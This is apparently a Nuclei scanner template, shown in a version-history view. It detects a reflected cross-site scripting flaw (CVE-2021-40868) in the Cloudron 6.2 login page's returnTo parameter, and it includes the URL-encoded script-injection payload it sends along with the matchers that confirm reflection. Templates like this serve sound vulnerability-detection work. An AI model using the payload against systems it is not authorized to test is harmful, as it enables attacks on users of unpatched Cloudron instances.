my-nuclei-templates/CVE-2021-40868.yaml

43 lines
1.2 KiB
YAML
Raw Permalink Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2021-40868
info:
2022-06-18 08:05:25 +00:00
name: Cloudron 6.2 Cross-Site Scripting
2021-11-09 22:49:13 +00:00
author: daffainfo
severity: medium
2022-06-18 08:05:25 +00:00
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
2021-11-09 22:49:13 +00:00
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
2022-06-18 08:05:25 +00:00
- https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html
- https://www.cloudron.io/
remediation: Upgrade to Cloudron 6.3 or higher.
2021-11-09 22:49:13 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-11-09 22:49:13 +00:00
cve-id: CVE-2021-40868
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2021,xss,cloudron
2021-11-09 22:49:13 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/03/06